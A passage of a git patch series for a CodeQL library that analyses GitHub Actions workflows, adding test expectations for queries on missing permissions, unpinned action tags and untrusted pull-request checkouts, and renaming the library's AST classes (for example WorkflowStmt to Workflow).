b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected new file mode 100644 index 00000000000..174f9d49e87 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -0,0 +1 @@ +| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref new file mode 100644 index 00000000000..ad1c6a99660 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -0,0 +1,2 @@ +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/actor_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml new file mode 100644 index 00000000000..992686fb5aa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -0,0 +1,11 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: foo/bar + - uses: foo/bar@v1 + - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml similarity index 100% rename from ql/src/test/.github/workflows/untrusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected new file mode 100644 index 00000000000..169d9c9ac2b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -0,0 +1,7 @@ +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref new file mode 100644 index 00000000000..8c9db66bf6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected new file mode 100644 index 00000000000..76d47eec191 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -0,0 +1 @@ +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref new file mode 100644 index 00000000000..b0c41e712e5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckout.ql From 0eabdd9507685da01ff505fb88fc338cba4a8761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 09:44:33 +0100 Subject: [PATCH 0081/1267] Rename classes --- ql/lib/codeql/actions/Ast.qll | 275 +++++++++--------- .../actions/controlflow/BasicBlocks.qll | 1 - .../actions/controlflow/internal/Cfg.qll | 101 +++---- .../codeql/actions/dataflow/ExternalFlow.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 6 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 59 ++-- .../dataflow/internal/DataFlowPublic.qll | 12 +- ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 4 +- .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 4 +- .../CWE-020/ReusableWorkflowsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../CWE-275/MissingActionsPermissions.ql | 8 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 20 +- ql/test/library-tests/test.expected | 61 +--- ql/test/library-tests/test.ql | 44 ++- 22 files changed, 292 insertions(+), 340 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bbf5c8ac0d..881daf13336 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. Based on YamlNode from the Yaml library. + * Base class for thejAST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -14,20 +14,16 @@ class AstNode instanceof YamlNode { string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } Location getLocation() { result = super.getLocation() } -} - -/** - * A statement is a group of expressions and/or statements that you design to carry out a task or an action. - * Any statement that can return a value is automatically qualified to be used as an expression. - */ -class Statement extends AstNode { - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } /** - * Gets a environment variable expression by name in the scope of the current step. + * Gets the enclosing workflow statement. */ - Expression getEnvExpr(string name) { + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + EnvExpr getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -40,37 +36,32 @@ class Statement extends AstNode { } } -/** - * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. - */ -class Expression extends Statement { } - /** * A composite action */ -class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { - RunsStmt getRunsStmt() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof Actions::CompositeAction { + Runs getRuns() { result = super.getRuns() } - InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } } -class RunsStmt extends Statement instanceof Actions::Runs { - StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } +class Runs extends AstNode instanceof Actions::Runs { + Step getAStep() { result = super.getSteps().getElementNode(_) } - StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } + Step getStep(int i) { result = super.getSteps().getElementNode(i) } } /** * A Github Actions Workflow */ -class WorkflowStmt extends Statement instanceof Actions::Workflow { +class Workflow extends AstNode instanceof Actions::Workflow { string getName() { result = super.getName() } - JobStmt getAJobStmt() { result = super.getJob(_) } + Job getAJob() { result = super.getJob(_) } - JobStmt getJobStmt(string id) { result = super.getJob(id) } + Job getJob(string id) { result = super.getJob(id) } predicate hasTriggerEvent(string trigger) { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) @@ -80,27 +71,25 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } -class ReusableWorkflowStmt extends WorkflowStmt { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; - ReusableWorkflowStmt() { - this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call - } + ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } + Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } } -class InputsStmt extends Statement instanceof YamlMapping { +class Inputs extends AstNode instanceof YamlMapping { YamlMapping parent; - InputsStmt() { parent.lookup("inputs") = this } + Inputs() { parent.lookup("inputs") = this } /** * Gets a specific input expression (YamlMapping) by name. @@ -111,10 +100,10 @@ class InputsStmt extends Statement instanceof YamlMapping { } } -class OutputsStmt extends Statement instanceof YamlMapping { +class Outputs extends AstNode instanceof YamlMapping { YamlMapping parent; - OutputsStmt() { parent.lookup("outputs") = this } + Outputs() { parent.lookup("outputs") = this } /** * Gets a specific output expression (YamlMapping) by name. @@ -127,10 +116,16 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } -class StrategyStmt extends Statement instanceof YamlMapping { +class Permissions extends AstNode instanceof YamlMapping { YamlMapping parent; - StrategyStmt() { parent.lookup("strategy") = this } + Permissions() { parent.lookup("permissions") = this } +} + +class Strategy extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Strategy() { parent.lookup("strategy") = this } /** * Gets a specific matric expression (YamlMapping) by name. @@ -144,31 +139,10 @@ class StrategyStmt extends Statement instanceof YamlMapping { } } -class InputExpr extends Expression instanceof YamlString { - InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } -} - -class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { - exists(OutputsStmt outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -class MatrixVariableExpr extends Expression instanceof YamlString { - MatrixVariableExpr() { - exists(StrategyStmt outputs | - outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this - ) - } -} - /** * A Job is a collection of steps that run in an execution environment. */ -class JobStmt extends Statement instanceof Actions::Job { +class Job extends AstNode instanceof Actions::Job { /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. @@ -176,20 +150,20 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStepStmt(int index) { result = super.getStep(index) } + Step getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStepStmt() { result = super.getStep(_) } + Step getAStep() { result = super.getStep(_) } /** * Gets a needed job. * eg: * - needs: [job1, job2] */ - JobStmt getNeededJob() { + Job getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and - result = needs.getANeededJob().(JobStmt) + result = needs.getANeededJob() ) } @@ -199,7 +173,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -209,42 +183,42 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + JobUses getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } - Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } - StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } } /** * A Step is a single task that can be executed as part of a job. */ -class StepStmt extends Statement instanceof Actions::Step { +class Step extends AstNode instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJobStmt() { result = super.getJob() } + Job getJob() { result = super.getJob() } - IfStmt getIfStmt() { result = super.getIf() } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class IfStmt extends Statement { +class If extends AstNode { YamlMapping parent; - IfStmt() { + If() { (parent instanceof Actions::Step or parent instanceof Actions::Job) and parent.lookup("if") = this } - Statement getEnclosingStatement() { result = parent } + AstNode getEnclosingNode() { result = parent } string getCondition() { result = this.(YamlScalar).getValue() } } @@ -252,7 +226,7 @@ class IfStmt extends Statement { /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class UsesExpr extends Expression { +abstract class Uses extends AstNode { abstract string getCallee(); abstract string getVersion(); @@ -263,10 +237,10 @@ abstract class UsesExpr extends Expression { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUsesExpr extends StepStmt, UsesExpr { +class StepUses extends Step, Uses { Actions::Uses uses; - StepUsesExpr() { uses.getStep() = this } + StepUses() { uses.getStep() = this } override string getCallee() { result = uses.getGitHubRepository() } @@ -288,12 +262,10 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlMapping { - JobUsesExpr() { - this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) - } +class JobUses extends Uses instanceof YamlMapping { + JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJobStmt() { result = this } + Job getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -336,10 +308,10 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { /** * A Run step represents the evaluation of a provided script */ -class RunExpr extends StepStmt, Expression { +class Run extends Step { Actions::Run scriptExpr; - RunExpr() { scriptExpr.getStep() = this } + Run() { scriptExpr.getStep() = this } Expression getScriptExpr() { result = scriptExpr } @@ -347,24 +319,59 @@ class RunExpr extends StepStmt, Expression { } /** - * Evaluation of a workflow expression ${{}}. + * An AST node associated with a Reusable Workflow input. */ -class ExprAccessExpr extends Expression instanceof YamlString { - string expr; - - ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } - - string getExpression() { result = expr } - - JobStmt getJobStmt() { result.getAChildNode*() = this } +class InputExpr extends AstNode { + InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } } /** - * A context access expression. + * An AST node holding an Env var value. + */ +class EnvExpr extends AstNode { + EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +} + +/** + * An AST node holding a job or workflow output var. + */ +class OutputExpr extends AstNode { + OutputExpr() { + exists(Outputs outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } +} + +/** + * An AST node holding a matrix var. + */ +class MatrixVariableExpr extends AstNode { + MatrixVariableExpr() { + exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) + } +} + +/** + * Evaluation of a workflow expression ${{}}. + */ +class Expression extends AstNode instanceof YamlString { + string expr; + + Expression() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + Job getJob() { result.getAChildNode*() = this } +} + +/** + * A ${{}} expression accessing a context variable. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -class CtxAccessExpr extends ExprAccessExpr { - CtxAccessExpr() { +class ContextExpression extends Expression { + ContextExpression() { expr.regexpMatch([ stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), matrixCtxRegex() @@ -373,7 +380,7 @@ class CtxAccessExpr extends ExprAccessExpr { abstract string getFieldName(); - abstract Expression getRefExpr(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -406,11 +413,11 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsCtxAccessExpr extends CtxAccessExpr { +class StepsExpression extends ContextExpression { string stepId; string fieldName; - StepsCtxAccessExpr() { + StepsExpression() { expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and fieldName = expr.regexpCapture(stepsCtxRegex(), 2) @@ -418,9 +425,9 @@ class StepsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and - result.(StepStmt).getId() = stepId + result.(Step).getId() = stepId } } @@ -429,12 +436,12 @@ class StepsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsCtxAccessExpr extends CtxAccessExpr { - JobStmt job; +class NeedsExpression extends ContextExpression { + Job job; string jobId; string fieldName; - NeedsCtxAccessExpr() { + NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and jobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -445,14 +452,14 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputsStmt() = result + job.getOutputs() = result or // reusable workflow calling jobs - job.getUsesExpr() = result + job.getUses() = result ) } } @@ -462,11 +469,11 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsCtxAccessExpr extends CtxAccessExpr { +class JobsExpression extends ContextExpression { string jobId; string fieldName; - JobsCtxAccessExpr() { + JobsExpression() { expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and fieldName = expr.regexpCapture(jobsCtxRegex(), 2) @@ -474,11 +481,11 @@ class JobsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(JobStmt job | + override AstNode getTarget() { + exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputsStmt() = result + job.getOutputs() = result ) } } @@ -488,21 +495,23 @@ class JobsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsCtxAccessExpr extends CtxAccessExpr { +class InputsExpression extends ContextExpression { string fieldName; - InputsCtxAccessExpr() { + InputsExpression() { expr.regexpMatch(inputsCtxRegex()) and fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { + override AstNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) - or - exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) + ( + exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result) + or + exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result) + ) } } @@ -511,18 +520,18 @@ class InputsCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvCtxAccessExpr extends CtxAccessExpr { +class EnvExpression extends ContextExpression { string fieldName; - EnvCtxAccessExpr() { + EnvExpression() { expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(Statement s | + override AstNode getTarget() { + exists(AstNode s | s.getEnvExpr(fieldName) = result and s.getAChildNode*() = this ) @@ -534,24 +543,24 @@ class EnvCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixCtxAccessExpr extends CtxAccessExpr { +class MatrixExpression extends ContextExpression { string fieldName; - MatrixCtxAccessExpr() { + MatrixExpression() { expr.regexpMatch(matrixCtxRegex()) and fieldName = expr.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(WorkflowStmt w | - w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + override AstNode getTarget() { + exists(Workflow w | + w.getStrategy().getMatrixVariableExpr(fieldName) = result and w.getAChildNode*() = this ) or - exists(JobStmt j | - j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + exists(Job j | + j.getStrategy().getMatrixVariableExpr(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll index cdc7b0cf24f..af5e0f62552 100644 --- a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -442,4 +442,3 @@ class ConditionBlock extends BasicBlock { */ predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } } - diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index b8137172b8c..2bc86723493 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -83,9 +83,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + class WorkflowScope extends CfgScope instanceof Workflow { } - class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } + class CompositeActionScope extends CfgScope instanceof CompositeAction { } } private module Implementation implements CfgShared::InputSig { @@ -119,13 +119,13 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(WorkflowStmt), e) or - first(scope.(CompositeActionStmt), e) + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) } predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(WorkflowStmt), e, c) or - last(scope.(CompositeActionStmt), e, c) + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -143,14 +143,14 @@ private import CfgImpl private import Completion private import CfgScope -private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(CompositeActionStmt).getInputsStmt() or - child = this.(CompositeActionStmt).getOutputsStmt() or - child = this.(CompositeActionStmt).getRunsStmt() + child = this.(CompositeAction).getInputs() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() ) and l = child.getLocation() | @@ -161,21 +161,21 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos } } -private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { - override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } } -private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { override ControlFlowTree getChildNode(int i) { - if this instanceof ReusableWorkflowStmt + if this instanceof ReusableWorkflow then result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflowStmt).getInputsStmt() or - child = this.(ReusableWorkflowStmt).getOutputsStmt() or - child = this.(ReusableWorkflowStmt).getStrategyStmt() or - child = this.(ReusableWorkflowStmt).getAJobStmt() + child = this.(ReusableWorkflow).getInputs() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -185,10 +185,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ) else result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAJobStmt() or - child = super.getStrategyStmt() + child = super.getAJob() or + child = super.getStrategy() ) and l = child.getLocation() | @@ -199,10 +199,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class InputsTree extends StandardPreOrderTree instanceof Inputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getInputExpr(_) and l = child.getLocation() | child @@ -212,12 +212,10 @@ private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { } } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getOutputExpr(_) and l = child.getLocation() | child @@ -227,12 +225,10 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { +private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getMatrixVariableExpr(_) and l = child.getLocation() | child @@ -242,17 +238,15 @@ private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt } } -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class JobTree extends StandardPreOrderTree instanceof JobStmt { +private class JobTree extends StandardPreOrderTree instanceof Job { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAStepStmt() or - child = super.getOutputsStmt() or - child = super.getStrategyStmt() or - child = super.getUsesExpr() + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() or + child = super.getUses() ) and l = child.getLocation() | @@ -263,12 +257,10 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class UsesExprTree extends LeafTree instanceof UsesExpr { } - -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and l = child.getLocation() | @@ -279,11 +271,10 @@ private class UsesTree extends StandardPreOrderTree instanceof 